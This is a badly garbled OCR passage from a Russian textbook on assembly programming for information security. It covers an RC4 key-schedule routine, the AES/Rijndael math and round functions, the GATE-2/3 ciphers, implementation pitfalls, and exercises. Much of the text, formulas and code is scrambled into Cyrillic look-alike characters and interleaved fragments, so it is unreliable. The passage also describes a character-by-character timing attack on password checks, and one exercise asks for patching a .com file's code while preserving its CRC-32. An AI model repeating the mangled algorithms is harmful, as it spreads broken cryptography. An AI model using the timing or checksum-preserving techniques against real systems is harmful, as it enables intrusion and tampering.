разн ах 
оу а1, ВУТЕ РТВ [6х + $1] 
хог а], ВУТЕ РТВ [Ъх + 91] 
хог ВУТЕ РТВ [5х + 91], а\ 
хог а1, ВУТЕ РТВ [5х + 91] 
ем ВУТЕ РТВ [Ъх + 31], а!1 
рор ах | 
ге 

бкернРегиЗ ЕМОР 


На рис. 2.7.6 показан пример инициализации 4-разрядного генератора ПСП АС4 с исполь 
зованием ключа 12238. 


КеуМаз85 
ЕБ:ВХ 
КеуМау 
Е: [ВХ+256] 
5 


Рис. 2.7.5. Массив КеуМа&5 


Исходное 


заполненные;  1-итакт  2-йтак  Зитак  4йтакт  б-йтакт 6-й такт 8-й такт 


7-й такт 


[2 
- 
м 





юоюочомллоитюрно 


1 1 
2 2 
з 3 
4 4 
5 5 
6 6 
7 7 
8 8 
9 9 


фоочаонгь» 


ны 
вне 
ньныь 
шьно 
> 
[= 


> 
> 
- 
> 





> 
^ 
- 
м 


Рис 
- 2.7.6. Последовательность тактов перемешивания 4-разрядного массива $ 
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2.8. Стандарт криптографической защиты 
ХЖ века — Адуапсед Епсгурбоп Запдагд (АЕ5) 


2.8.1. — История конкурса на новый стандарт 


криптозащиты 


В 1997 г. НИСТ (национальный институт стандартов и технологий США) объявил о нача; 
программы по принятию нового стандарта криптографической защиты, стандарта ХХ! века д; : 
закрытия важной информации правительственного уровня, на замену существующему с 1974 
алгоритму РЕ5, самому распространенному криптоалгоритму в мире. РЕЗ считается устаре:. 
шим по многим параметрам: длине ключа, удобству реализации на современных процессора 
быстродействию и другим, за исключением самого главного — стойкости. За 25 лет интенсивно; 
криптоанализа не было найдено методов вскрытия этого шифра, существенно отличающихся г: 
эффективности от полного перебора по ключевому пространству. 

На конкурс были приняты 15 алгоритмов, разработанные криптографами 12 стран - 
Австралии, Бельгии, Великобритании, Германии, Израиля, Канады, Коста-Рики, Норв: 
гии, США, Франции, Южной Кореи и Японии. р 

В октябре 2000 г. конкурс завершился — победителем был признан бельгийский шифр 
КИМРАЕЕ, как имеющий наилучшее сочетание стойкости, производительности, эффектир- 
ности реализации, гибкости. Его низкие требования к объему памяти делают его идеально 
подходящим для встроенных систем. Авторами шифра являются Тоап Паетеп и Утсей 
Ептеп, начальные буквы фамилий которых и образуют название алгоритма — АЛЛУДАЕЕ. 


2.3.2. Математические основы 


В криптоалгоритме операции выполняются над байтами и четырехбайтовыми слова 
ми. Байты рассматриваются как элементы поля СЕ(2*). Для построения поля авторами 
АНМЛАЕЕ был выбран неприводимый многочлен показателя 51: 

фо ЕЖх + +х+ 1 (см. рис. 2.4.8). 

Четырехбайтовому слово может быть поставлен в соответствие многочлен 
с коэффициентами из СЕ(2*) степени не более 3. Сумма двух многочленов с коэффиий" 
ентами из СЁ| (2°) — это обычная операция сложения многочленов с приведением подоб- 
ных членов в поле СЕ(2*). Таким образом сложение двух четырехбайтовых слов сут? 
операция поразрядного ХОК. 


Умножение — более сложная операция. Предположим, мы перемножаем два мноГ”” 
члена 





„основе вн ОИ ав ое оо сов они вв ооо ничи вии вии вин вв ояочении 
ео ии ии ие меняя начни попа ирррр родив аня зоо няаииаааааа ни мниоовеююзнва 
Я АН ВОН а ная ниче нове рвозино: 


а(х) = азх? + ах? +ах+ аи = + +Ьх+ В. 
Результатом умножения 
с(х) = ах), 
будет многочлен 
с(х) = све + се + сах? + сб + ох? + сах + Со, 
где 
Со = або 
с. = а160 Ф в 
с2 = або Ф аб, ® аб, 
Сз = аз Ф а26, Ф а1Б, ® в, 
С4 = азб! Ф а26, Ф аб, 
с5 = азб. Ф а2Б; 
С6 = азбз. 
Для того чтобы результат умножения мог быть представлен 4-байтовым словом, 


необходимо взять результат по модулю многочлена степени не более 4. Авторы шифра 
выбрали многочлен 


Фо =х" +1, 
для которого справедливо | 
х' то4ф(х) = х' "4. 
Таким образом, результатом умножения двух многочленов 
4(‹) = а(х) ® 6х) 
будет многочлен 
х) = 4х + фо +ах+ 4, 
где 
ф = аобо Ф аз Ф а26> Ф аз 
[#1 = а!65 Ф аоб1 Ф азё> ® а26з 
ф = а26о Ф аб: ® аб @ азбз 
4 = аз Ф а Ф а!5> Ф аобз. 
В матричной форме это может быть записано следующим образом 
4 4 а, а, а, Ь 
а |а а а а В 
ы а, а, а а а] 


а, а а а @& Ь, 


На рис. 2.8.1 показано устройство для одновременного умножения многочлена 
Вх) = Бух + Бо +Ьх + Ь 
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на многочлен 
а(х) = азх? + ах? + ах + @ 
и деления на 
фо) =х" +1, 


На получение результата (остатка от деления произведения а(х)Ь(х) на Ф(х)) Требу. 
ется 4 такта. Подача на вход устройства при нулевом начальном состоянии последова, 
тельности 1000 вызывает следующую последовательность переключений регистров: 

аоа1а2аз 
азаа1 а? 
а>аза0а1 
Я1а2аз@0- 

Каждое состояние приведенной последовательности дает соответствующий столбец 

матрицы преобразования, обеспечивающего получение того же результата за один такт. 








Рис. 2.8.1. Устройство для одновременного умножения и деления многочленов 





Пусть 
Ых) = Бу + В +В х + В. 
Умножению на х многочлена (х) с коэффициентами из СЁ(2°) по модулю многочлена 
ф(х) =х* +1, 
учитывая свойства последнего, соответствует циклический сдвиг байтов в пределах 
слова в сторону старшего байта, так как 
х® Ы(х) = В + Ьых? + Вх + В. 





2.8.3. Структура шифра 


ВИЛ/МРАЕЕГ - это итерационный блочный шифр, имеющий архитектуру "квадрат" (р# 
2.8.2, а). Рассеивающие и перемещивающие свойства шифра иллюстрирует рис. 2.8.2, 
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ГЛАВА линии нии нинниинтна шить 


.. 
Вы 


ифр имеет переменную длину блоков и различные длины ключей. Длина ключа и дли 
а блока могут быть равны независимо друг от друга 128, 192 или 256 битам. 

Промежуточные результаты преобразований, выполняемых в рамках криптоалгорит. 
ма, называются состояниями (а{е). Состояние (рис. 2.8.2) можно представить в вид 
} ямоугольного массива байтов. Этот массив имеет 4 строки, а число столбцов № равн 
ине блока, деленной на 32. | 
Ключ шифрования также представлен в виде прямоугольного массива с четырьмя 
строками. Число столбцов №, равно длине ключа, деленной на 32. 

В некоторых случаях ключ шифрования рассматривается как линейный массив 4- 
байтовых слов. Слова состоят из 4 байтов, которые находятся в одном столбие (прь 
представлении в виде прямоугольного массива). 

Входные данные для шифра обозначаются как байты состояния в порядке ао, ао, а20 
аз» ао, ап» 42, аз, ал ... После завершения действия шифра выходные данные получа. 
ются из байтов состояния в том же порядке. 

Число раундов М, зависит от значений М, и № как показано в таблице 2.8.1. 


пр 

















Функция Е, Добавление раундового ключа А4ААоипаКеу 
зашифрования : 
АПМОАЕЕ 


9-й раунд 


10-й раунд 





® - измененный байт 


Входной Мисоити; 


Михбоити; 
блок 1-го раунда 


2-го раунда 


5$ЫЙКои5 
2-го раунда 


Рс. 2.8.2. Криптоалгоритм КИМРАЕЕ: 
а — схема функции Ех зашифрования при № = № = 4; 
6 — принцип действия 
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Рис. 2.8.3. Пример представления состояния (Ме = 4) и ключа шифрования (М = 4) 


Таблица 2.8.1. Число раундов М, как функция от длины ключа № и длины блока № 





Раундовое преобразование. Раунд состоит из четырех различных преобразовани 
(см. рис. 2.8.2, а). На псевдо-Си это выглядит следующим образом: 
И иееженаанекянеенниннянкснкянаненнннннннннннн==========5Н=5555=5=555=== 
КоипЯ (5таее, ВоцпаКеу} 
{ 


бирВукез (5+аее); // замена байтов 
$11Е5Вомз (56аее); // сдвиг строк 
Му хо иле (5ЕаЕе} ; // перемешивание столбцов 


АааВочпЯКеу (55аЕе, ВочпаКеу); // добавление раундового ключа 


[| нЕЕеЕЕЕЕЕЕЕЕЕНЕНЕЕЕЕЕЕЕЕЕЕЕЕНЕНЕНЕЕЕЕНЕЕЕЕЕНЕНЕННТНННЕНННЯНЕЕН5=2 
Е1па1Воппа (5$абе, КоипаКеу) 

{ 

ЗиБВуеез (56 аее); 

$В1{5Вомз (56абе); 

АаЗВоипаКеу (5+аее, ВКоипаКеу); 


// замена байтов 
// сдвиг строк 
// добавление раундового ключа 


В приведенной записи функции (Коима, ЗиБВуеу и т. д.) выполняют свои действ’ 


над массивами, указатели (т. е. ${ще, КоипаКеу) на которые им передаются. 

.. Е 
Как можно заметить, последний цикл отличается от всех остальных только отсутстви 
перемешивания столбцов. Каждое из приведенных преобразований разобрано далее. 


„рано вре ва вр вии ина а наи ав ив вв вв ваонинианноя повоннаиининивию 
., . оквосаевоная иена ни они новини я на ооввииива 


Замена байтов (Зи 6Ву(е$). Преобразование биБВу{ез представляет собой нели 
нейную замену байтов, выполняемую независимо над каждым байтом состояния 
Таблицы замены 5-блока являются инвертируемыми и построены из композици 
двух преобразований: 

} | 
р получение обратного элемента относительно умножения в поле СЕ (2°), нулевой эле 


мент '00' переходит сам в себя; 


2) применение преобразования над СР(2), определенного как: 


я ПП оОботЕгт И 
дитооотт Их | 
ито Их 0 
итттооо 1, | 
Уп ттттоо 0х 
7 10, |1 
| 0 отт 
| бот их |0 


Применение описанного 5-блока ко всем байтам состояния обозначено как биБВуе 
(бе). Рис. 2.8.4 иллюстрирует применение преобразования ЗибВу!ех к состоянию. 





Рис. 2.8.4. 5ирВуез действует на каждый байт состояния 


С Реобразование сдвига строк ($ЫИВо\$). Последние 3 строки состояния цикличе 
сдвигаются на различное число байт. Строка | сдвигается на С1 байт, строка 2 —н 


6 й С 
рат и строка 3 — на СЗ байт. Значения сдвигов С1, С2 и СЗ зависят от длины блок 
. ИХ величины приведены в таблице 2.8.3. 


Таблица 2.8.3. Величина сдвига для разной длины блокс 








ОИ 








| 


пы ы *==.. имеено но т. попооовонироовововониа ...” пченнии 
о ооооо наи оон оз вонь ва озоооараене оооввееь овонаеааноное 
... . оооновроо они новане 
.. 


клового ключа равна длине блока №. Преобразование, содержащее добавление по- 
средством ХОК раундового ключа к состоянию (рис. 2.8.7), обозначено к 
„дукоитаКеу(Эиие, КоипаКеу). у ак 


рис. 2.8.7. При добавлении ключа раундовый ключ складывается посредством операции ХОК с состоянием 


> 
Операция сдвига последних 3 строк состояния на определенную величину обозначен 
как 5 /Юомз (51а). Рис. 2.8.5 показывает влияние преобразования на состояние. ь 


Рис. 2.8.5. $ ИКом/5 действует на строки состояния 











Преобразование перемешиваиия столбцов (МЕхСоитп5). В этом преобразовании 


столбцы состояния рассматриваются как многочлены над СЕ) и умножаются по мод). 
Алгоритм выработки ключей (Кеу 5сНедше). Раундовые ключи получаются из 


люх нам ), т : ф твом ал! 
5 ЛЯДЯЩИЙИ следующим образом ключа ши ования посре 

+] ногочлен х), ВЫ ) ля , р и, 2 р редс ( оритма ати ключей. Он содержит два компо 

я(х = 03 3 + 91х + 1х + 02 нента: расширение ключа Ке Ехрапяюп и выбор раундового ключа Коипа Ке 
е кожет быте пре дставлено в мат ричном виде следующим образом весНоп). Основопола ающи принципы ал оритма выглядя' следую 6 7 

$ сновополаг е 1 Т Т щим о разом: 
Ь "0 2, '0 3' '0 ' 0 ' [АТ 
] ] и общее число бит раундовых ключей равно длине блока, умноженнои на число раун- 


дов плюс | (например, 
лового Оха ример, для длины блока 128 бит и 10 циклов требуется 1408 бит цик- 


ь| _|'0Г '02’ '03’ 'ОЁР а, 


! г г ! ! ! ! ! 
р, от от м м Ч: й ключ шифрования расширяется в расширенный ключ (Ехрапде4 Кеу); 
Ь,| |'03 '0Г '01 02 аз и раундовые ключи берутся из расширенного ключа следующим об азом: й 
Применение этой операции ко всем четырем столбцам состояния обозначено как раундовый ключ содержит первые М№ слов, второй — следующие № ов и т. д. вы 
МиСоштп($иае). Рис. 2.8.6 демонстрирует применение преобразования МыСошти Расширеиие ключа (Кеу Ехрапзюп). Расширенный . 
к столбцу состояния. линейный массив 4-байтовых слов и обозначен как ренный ключ представляет собой 
ИМ &(М№ „+ 1). 


пере № слов болержат ключ шифрования. Все остальные слова определяются рекур- 
Но и индексами. Алгоритм выработки ключей зависит от величины 
приведена версия для №, равного или меньшего 6, и версия для №, большего 6 
Для №, < 6 имеем: | | 








Рис. 2.8.6. МихСо/итпз действует на столбцы состояния гы С =0; 1 < МК; 1++) И[1] = С1рвегКеу[11; 
‚ . ог 2” № < ОИ: =) 
Добавление рауидового ключа. В данной операции раундовый ключ добавляй я 
к состоянию посредством простого поразрядного ХОК. Раундовый ключ вырабатывает" мы = И[]-МК] ^ ирВубез( ВоЁ1( [3-1] ) )} ^ Всоп[3/МК]; 
из ключа шифрования посредством алгоритма выработки ключей (кеу сспефи!е). Дли мн > я, 1 < м && 1+) < №* (№1); 1+9) и 
= 9 [1+)-№] ^ и[(+)-11; 














210 Ассемблер в задачах защиты Форма 


`Как можно заметить, первые № слов заполняются ключом шифрования. Как 
последующее слово И[Й получается посредством ХОК предыдущего слова И]:-1] и с 
на №, позиций ранее И! - №]. Для слов, позиция которых кратна №, перед ХОК при 
няется преобразование к [1], а затем еще прибавляется раундовая константа. Пре 
разование содержит циклический сдвиг байтов в слове, обозначенный как Кой, зат, 
слетует биБВуе — замена байт. 

Для №, > 6 имеем: 

[| ЕЕЕЕЕеененеЕнЕЕнЕненЕЕЕЕЕЕЕНЕЕЕНЕЕЕНЕЕНЕЕЕНЕЕЕЕНЕЕЕНЕНЕЕНЕЕЕЕЕЕЕ 
КеуЕхрапз1от (С1рвегКеу, М) 
{ 
Рог (1=0; 1<МК; 1++) М[1]=С1рвегКеу[1]; 
Рог ()=МК; )<М5* (№+1); )+=М№К) 
{ 
И] = М[)-М№] ^ ЗаБВусез (Воё1 (И[)-1])) ^ Всоп [3/МК]; 
Фот (1=1; 1<4; 144) ИН] = И-М] ^ и19-0; 
[+4] = #[)+4-№] ^ ЗаЪВусез (9 [3+3]); 
ог (1=5; 1<5; 14+) и[1+3] = ЧМ] ^ 94-0; 


Отличие по сравнению с ранее рассмотренной схемой состоит в применении биБВу!е; 
для каждого 4-го байта из №. 

Раундовая константа не зависит от № и определяется следующим образом: 
Юсоп[Й = ( ВСП, '00' ,'00' ,'00'), где 

ВСо]=01' 

ВС[Й=хите(ВС[Т:-1]) 

Выбор раундового ключа. /-й раундовый ключ получается из слов массива раундо 
вого ключа от И]М№ь.Й и до ИМС + 1], как показано на рис. 2.6.8. 


Примечание 

Алгоритм выработки ключей можно осуществлять и без использования массив 
ЯМЫ, + 1]. Для реализаций, в которых существенно требование к занимаемой памяти 
цикловые ключи могут вычисляться на лету посредством использования буфера из №. 


Криптоалгоритм. Шифр Вйпадае! состоит из: 
м начального добавления раундового ключа; 
Ш №, - 1 раундов; 
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ххх < Ч ххх 9 сх 
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| р < 
о К С К ое К К А 
раундсвый ключ 0 Раундовый ключ 1 Раундовый ключ 2 















",=и.ФНи, 1), 1> 3 
Ел) = №, если {= 0 под 4 
Ен, 1) = ЗибВуез(КоН(и, ,)) © Ксоп, если = 0 той 4 


Рис. 2.8.8. Расширение ключа и выбор раунчового ключа для Мь = 4 и № = 4 


На псевдо-Си это выглядит следующим образом: . 
// ЕЕЕЕЕВБЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕЕЕЕЕЕЕЕ== 
31]п9ае1 (З5афе, С1рвегКеу) 
{ 
КеуЕхрапз1оп (С1рНегКеу, ЕхрапдедКеу); 
Аа9ВоипаКеу (З+аке, ЕхрапдедКеу); 


// Расширение ключа 
// Добавление 

/{ раундового ключа 
Рог (1=1 ; 1<№; ; 1++) Воппа (5Каце,ЕхрапдедКеу+М*1); 

/{ циклы 


Р\па1ВомпЯ ($5абе, ЕхрапаеаКеу+МЬ*М№)}; // заключительный цикл 


Если предварительно выполнена процедура расширения ключа, то Кйпаае! буде 


выглядеть следующим образом: 
РОО ОИ 


лаве] (З5аке, СарнегКеу) 


А94ВоипаКеу (5касе, ЕхрапдеаКеу); 
РЕ { 1=1; 13: ; +) Кочла (5баце, ЕхрапдедКеу+МЬ*1); 
та]Воипа (56 аке, ЕхрапдедКеу+М*Мг); 


Расширенный ключ должен всегда получаться из ключа шифрования и никогда н 
Указывается напрямую. Нет никаких ограничений на выбор ключа шифрования. 
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2.8.4. 


Режимы шифрования при использовании блочных криптоалгоритмов ‚фис.2.89 _ 
2.8.12) универсальны: по приведенным схемам может использоваться любой из блочны; 
шифров, в том числе и КА/МРАЕЕ. 


Режимы шифрования 





а 6 


Рис 2.8.9. Шифрование в режиме простой замены {ЕСВ): а — зашифрование; 6 - расшифрование 
Е — функция зашифрования, Ок — функция расшифрования, р; — исходный блок (блок 
открытого текста}, с; — зашифрованный блок 








Рис. 2.8.10. Шифрование в режиме сцепления блоков шифротекста (СВО: а — зашифрованче; 
6 — расшифрование 





























рис. 2.8.11. Шифрование в режиме гаммирования (обратной связи по выходу — ОЕВ}: 
а — зашифрование; 


6 — расшифрование 





Рис. 2.8.12. Шифрование в 
шифротексту — СЕВ}: 
а — зашиафрование; 
6 — расшифрование 


режиме гаммирования с обратной связью (обратной связи по 


2.9. Блочный шифр САТЕ 


Блочный шифр САТЕ-2. Рассмотрим дальнейшее развитие архитектуры Квадрат на 
Примере блочного шифра САТЕ-2, ориентированного на использование в режимах гам- 


Мирования или гаммирования с обратной связью (режимы ОЕВ, Соипег и СЕВ). Основ- 
ЧЫе идеи, лежащие в основе проекта: 


и представление входных и выходных блоков данных, всех промежуточных результа- 
ТОВ преобразований в виде кубического массива байтов 4 х4х 4 (рис. 2.9.1, а); 


Использование секретного ключа произвольного размера (до 256 байтов); 


включение в состав раундовой операции всего двух преобразований — перемешивания 
Строк (МхКо\) и перемешивания столбцов (МахСоити); 


О 


ш использование стохастического сумматора при выполнении преобразований М!хКоу, 
и МиСоштп. 


Последовательность раундового преобразования блока данных (МихВюсК) размерох 
512 бит (4 х4х4хХ 8), имеющего структуру, показанную на рис. 2.9.1, где а, „, 


х=0,3, у= 0,3,2 = 0,3 — байты: 





1) разбиение блока данных на слой (Гауег) Го» ль Ёх2ь Ёаз ВДОЛЬ ОСИ Х (рис 2.9.2); 


2) перемешивание слоев (Мехгауей) [ль БР [3 путем выполнения для каждого сле» 
[х четырех (по числу строк) операций МихКом и четырех (по числу столбцов) опер. 
ций МхСошитп; . 








3) разбиение блока данных на слои Гуь [ль Бу» Гуз ВДОЛЬ ОСИ У (рис. 2.9.3); 


4) перемешивание слоев (МЕует) Ги, Гу», [уз путем выполнения для каждого слоя 
[жчетырех операций МихКо\ и четырех операций МахСоти; 


5) разбиение блока данных на сло" Г» [нь [ль [,з ВДОЛЬ ОСИ 2 (рис. 2.9.4); 


6) перемешивание слоев (Мет) а Галь Га» Раз ПУТЕМ выполнения для каждого слоя 
[к четырех (по числу строю операций МихКо\ и четырех (по числу столбцов) опера 


ций МихСо№мтп. а; 20 а 








Преобразования, осуцкествляемые при выполнении функции МыГауег, показаны на 
рис. 2.9.5. Преобразование 32-разрядного слова Мь\№отд, в котором участвуют байты В, 
строки (Во\) при операции МихКо\ или столбца (Сота) при операции МихСоштл, 


показано на рис. 2.9.6. 
Формирование таблицы стохастического преобразования из исходного секретного 


ключа выполняется по алгори!МУ, аналогичному тому, который используется в шифре а.,, р 
ВС4 при формировании таблицы замен. 





Рис. 2.9.1 Ши АТЕ-— - ©) НН — отаельн 6. 6 (9) НН 
„7.1. С : 
фр Е 2: а б^ к Ча ых; 6 9 льный бац лока Ча ых 





ИУ, 





к 


Рис. 2.9.3. Шифр САТЕ-2: а — разделение на слои вдоль оси у; 
6 6 - отдельный слой 1, К = 0, 3 


Рис. 2.9.2. Шифр САТЕ-2: а- разделение на слои вдоль ОСИ Х; 


б- отдельный слой Ёж, к=0,3 





























Мс. 2 | — 
2 , , — 
9.4. Шифр САТЕ-2: а — разделение на слои вдоль оси 2; 6 — отдельный слой (1, & = 0,3 
й 2 
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Рис. 2.9.5. Преобразование МихГауег: а — перемешивание слоя по строкам,; —_ На 
6 — перемешивание слоя по столбцам.; К, С! - исходное состояние соответственно | — И строки 


столбиа; К, С? - результат преобразования соответственно 1— д строки и !-го столбиа (= 0, 3) 
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Глава 2. 











рис. 2.9.6. Преобразование 32 —разрядного слова М \\/огд: 
Соигцег — счетчик, изменяющий свое состояние в каждом такте преобразования, 
®5т -— 8—разрядный стохастический сумматор (К—блок) 


Блочиый шифр САТЕ-3. Основные идеи, лежащие в основе проекта: 

и представление входных и выходных блоков данных, всех промежуточных результе 
тов преобразований в виде кубического массива байтов 4 х 4 х4 (рис. 2.9.1, а); 

и использование секретного ключа произвольного размера (до 256 байтов); 


и включение в состав раундовой операции всего двух преобразований — перемешивани 


слоя по горизонтали (МХГауегеВ и перемешивания слоя по вертикал 
(МхСомтиромт); 


и использование стохастического сумматора при выполнении преобразований Мауе 
Последовательность раундового преобразования блока данных (МихВюсК) размеро. 
512 бит (4 х4 х4х 8), имеющего структуру, показанную на рис. 2.9.1, где ах, у, 


х= 0,3, у=0,3,2 =0,3 - байты: 
1) разбиение блока данных на слои (Гауег$) Го, Гл» [х2, [з вдоль оси х (рис. 2.9.2); 


2) перемешивание слоев (М1ХГауег) Г, Си» [2, [,з путем выполнения для каждого слс 
[к операций МихГауегЕ1ейЕ и МихГауегРо\мт; 

3) разбиение блока данных на слои Гу» Гуль Гу, Гуз ВДОЛЬ ОСИ у (рис. 2.9.3); 

4) перемешивание слоев (МихГауег) Си, Ги, Гу», [уз путем выполнения для каждого слс 
Г операций МхГауег В 1еВЕ и МхГауегРо\п; 

5) разбиение блока данных на слои Г, Сил, Го, Г..з ВДОЛЬ ОСИ 2 (рис. 2.9.4); 


6) перемешивание слоев (МихГауег) Го, Ги, Ё.›, [,з путем выполнения для каждого слс 
1х операций МихГауег Ве и МихГауегРо\ п. 


Преобразования, осуществляемые при выполнении функции МихГауег, показаны + 
Рис. 2.9.7. Преобразование слова МёГауег, в котором участвуют 32-разрядные слов: 


роки (МихГауегро\мт) и 32-разрядные слова-столбцы (МихГауегЕ 120) у’, показаны 
Мс. 2.9.3. 
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Формирование таблицы стохастического преобразования из исходного секретно 
ключа выполняется по алгоритму, аналогичному тому, который используется в шиф. 
ВС4 при формировании таблицы замен. 
































Рис. 2.9.8. Преобразования МГ ауегомп и МГ ауег 1ЕПЁ а — схема преобразования; 
6 - варчант схемы 32-разрядного стохастического сумматора В 5ппз2; 


В — условное графическое обозначение 8— разрядного стохастического сумматора В$т; 
Сошцег — счетчик, изменяющий свое состояние в каждом такте преобразования 





Рис. 2.9.7. Преобразования МГ ауегОомл и МГ ауег Ре 
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2.10. Особенности программной реализации алгоритмов 
защиты информации 


Одной из основных причин компрометации систем защиты является неправильная 
реализация алгоритмов защиты информации, иначе говоря, наличие дефектов 
в программном коде. Печальная действительность такова, что ошибки в ПО будут возни. 
кать всегда. 


Основная причина ошибок — сложность современных компьютерных систем: 


№ сложные системы по определению менее надежные, 


ш сложные системы обязательно модульные, а взаимодействие модулей создает допол- 
нительные возможности для взлома защиты; 


ш сложные системы трудны для понимания их устройства, а это является необходимым 
условием безопасного управления ими; 

Ш сложные системы трудны для анализа из-за огромного числа вариантов взаимодейст- 
вия отдельных компонентов. 


Большинство дефектов в ПО не приводит к разрушительным последствиям. Ошибки, 
влияющие на выполнение основной задачи, относительно легко обнаруживаются на этапе 
тестирования. Значительно сложнее обнаружить дефекты в ПО системы безопасности. 
Ошибки, влияющие на вычисления, заметны, в то время как изъяны системы защиты могут 
долгое время оставаться невидимыми. Более того, эти дефекты вовсе не обязательно нахо- 
дятся в коде, относящемся к системе безопасности. Они могут присутствовать повсюду: 
в интерфейсе пользователя, в программе обработки ошибок, в любом другом месте, иначе 
говоря, на защищенность системы может повлиять любая самая безобидная с виду про“ 
грамма, не имеющая никакого отношения к компьютерной безопасности. 

Распространенная ошибка разработчиков ПО - расчет на "хорошего" пользователя, 
который будет обращаться с программой именно так, как задумано автором. Например 
в результате отсутствия или неправильной обработки нестандартных ситуаций, которые 
могут иметь место при работе программы (неопределенный ввод, ошибки пользователя, 
сбой и пр.), у противника появляется возможность искусственно вызвать в системе появ” 
ление такой нестандартной ситуации, чтобы выполнить нужные ему действия: остаться 
в системе с правами привилегированного пользователя или заставить процессор вылой" 
нить произвольный код. 

Наконец, относительно недавно получили распространение так называемые атаки Ч 
рез побочные каналы. Для ПО наиболее опасными являются временные атаки. Напр" 
мер, при взломе криптоалгоритмов противник вместо того, чтобы анализировать только 
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№ ое зини ино воовоонов Иов о ат ани ии воюнау 


входные и выходные данные, обращает внимание также на скорость выполнения объек- 
том атаки отдельных операций. Различные трассы выполнения алгоритма работы про- 
аммы, а также команды, выполняемые процессором, требуют разного времени 
в результате, анализируя временные характеристики отдельных шагов алгоритма, можно 
делать предположения о значениях аргументов, т. е. исходных данных или ключе. 
Например, можно провести следующую временную атаку на программу проверки па-_ 
роля. Берем случайный пароль и варьируем только первый символ. Предположим, что 
можно использовать только строчные и прописные английские буквы, 10 цифровых сим 
волов и некоторые знаки пунктуации (всего около 70 вариантов паролей с различным 
первым символом). Скорее всего, один из паролей будет проверяться дольше других 
прежде чем будет отклонен. Можно предположить, что это пароль с правильным первым 
символом. Повторим то же самое с остальными символами. Если атакуется 8- 


символьный пароль, то нужно проверить всего 560 паролей и измерить соответствующие 
временные задержки. 


Приблизительный анализ уязвимостей различных операций с точки зрения временных 
характеристик дает следующие результаты: 


# поиск по таблицам — неуязвим для временных атак; 

# фиксированные сдвиги — неуязвимы для временных атак; 

# булевы операции - неуязвимы для временных атак; 

@ сложение/вычитание — трудно защитить от временных атак; 

@ умножение/деление — наиболее уязвимые для временных атак операции. 


Стойкость к временным атакам можно повысить внесением неопределенности 
‚длительность работы отдельных актов алгоритма программы, например сделать 
ак, чтобы случайное время выполнения подпрограмм было равномерно распреде- 

тено на интервале [п шах]. р 
а приведен пример процедуры одного такта работы восьмиразрядного генератора 
о ‘мар ты которой не зависит от исходных данных из-за отсутствия арифме- 
анд и команд условных переходов. 












1Е5.2щ - процедура выполнения одного такта работы ЪЕЗВ, 
без использования команд условного перехода 

И арифметических операций. ===== ==== 
Вход: АБ - текущее состояние регистра, 
выход: АБ - новое состояние регистра === 


жх + х +х +1 Реедраск = 2ВВ 
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Задания для самостоятельной работы 

1) Разработать подпрограмму для нахождения табличным способом элемента пол; 
СЕ(2*), обратного заданному. 

2) Разработать подпрограмму для формирования 32-разрядного СВС-кода области памз. 
ти с использованием 32-канального СВС-генератора, соответствующего Ф(х) = хб® + 
х3? + | (контрольный код снимается с младших разрядов генератора). 

3) Используя смешанное программирование, разработать программу для определения 
содержимого таблицы стохастического преобразования на основе заданного фраг. 
мента ПСП конечной длины, полученного с выхода 8-разрядного ВЕЗК (М = 4). 

4) Разработать подпрограмму выполнения преобразования (а- Мк \ога (рис. 2.9.6), б_ 
МЫТауег (рис. 2.9.8)). Параметры должны передаваться через стек. 

5} Разработать без использования команд условного перехода и арифметических команд 
подпрограмму выполнения следующего преобразования (а — умножения не таблич- 
ным способом двух элементов поля СЕ(0*); б — поиска не табличным способом эле- 
мента поля СЕ(2*), обратного заданному; в — 8-разрядного стохастического преобра- 
зования; г — генерации элемента ПСП по алгоритму КЕЗК для М 4 д- 
преобразования МЕГауег (рис. 2.9.8)). 

6) Разработать подпрограмму выполнения следующего преобразования (а — умножения 
не табличным способом двух элементов поля СЕ(28); б — поиска не табличным спо- 
собом элемента поля СЕ(28), обратного заданному; в - 8-разрядного стохастического 
преобразования; г — генерации элемента ПСП по алгоритму ВЕЗК для М = 4; д- пре 
образования МХГауег, случайное время выполнения которого равномерно распреле- 
лено на интервале [нитт, бтах]. 

7) Разработать подпрограмму определения байта, который необходимо добавить 
кзаданной последовательности байтов, чтобы получить требуемое значение кола 
СКС-8 (‹(х) = ХЕХ" + + + 1). 

8) Разработать программу, которая замещает фрагмент кода заданного произвольного 
сот-файла от его точки входа кодом функций вывода на экран некоего сообщения # 
завершения программы таким образом, чтобы код СКВС-32 и размер сот-файла ост8 
лись неизменными. 

9) Разработать программную модель (резидентный обработчик прерывания 601) генератора су 
чайных и псевдослучайных последовательностей (8-разрядный ВЕЗК, М =4)с функциями: 


Ш ан =0- программный сброс; 


| . ес 
ш 21 = 1 — создание таблицы стохастического преобразования, на входе 45:51 — и 
ключевой последовательности байтов, сх — размер последовательности (в байтах), 
выходе — сформированные таблицы Адаг и Н; 
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ав=2- формирование контрольного кода, на входе 45:51 — адрес обрабатывае 
последовательности байтов, сх — размер последовательности (в байтах), на вых 
х:ах — сформированный контрольный код; | 

ява = 3 — чтение элемента ПСП (байта) и один такт работы ВЕЗВ; 


яна = 4 — инициализация КЕЗК случайным значением Социь где Соипё — значе! 
свыхода программного счетчика, изменяющего свое состояние по каждому преры 
нию от таймера; его состояние фиксируется в момент программного сброса ВЕУЕ. 


10) Используя программную модель генератора случайных последовательностей (СП) 
задания 9, разработать пермутирующую модульную программу, в которой поря; 
выполнения модулей определяется элементами СП (функция программы и состав 1 
дулей выбираются самостоятельно). 


1) Разработать программу для стетанографического скрытия текстовой строки внут 
текстового файла. Скрытие осуществляется путем кодирования расстояния мех 
словами файла-контейнера (0 — один пробел, 1 — два пробела). Текстовая строка в 


дится с клавиатуры, имя файла контейнера задается при запуске программы. Пре 
смотреть режим извлечения скрытой информации. | 


2) Используя смешанное программирование, разработать программу для стеганоград 
ческого скрытия информации в бтр-файле. На входе — файл-контейнер и скрываем 
файл, на выходе — результирующий файл. Информация скрывается в младших раз 
дах фо и оф и Ве. Предусмотреть равномерное распределение скрыв 
мо йлу-контейнеру с использованием генератора ПСП. Пре, 

треть режим извлечения скрытой информации. 

3) Используя смешанное программирование б 
полом 1 ‚ разработать программу для генерац 

данной разрядности (бит, 2 бита, 3 бита, 4 бита, байт, 2 байта, 4 байта, 64 6: 
ки длины (до 217 байт) с использованием алгоритма САТЕ-2 и записи ее в фа 
чевая информация, необходимая для работы алгоритма, считывается из файла. 
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Глава 3 
Программные средства защиты 


информации 


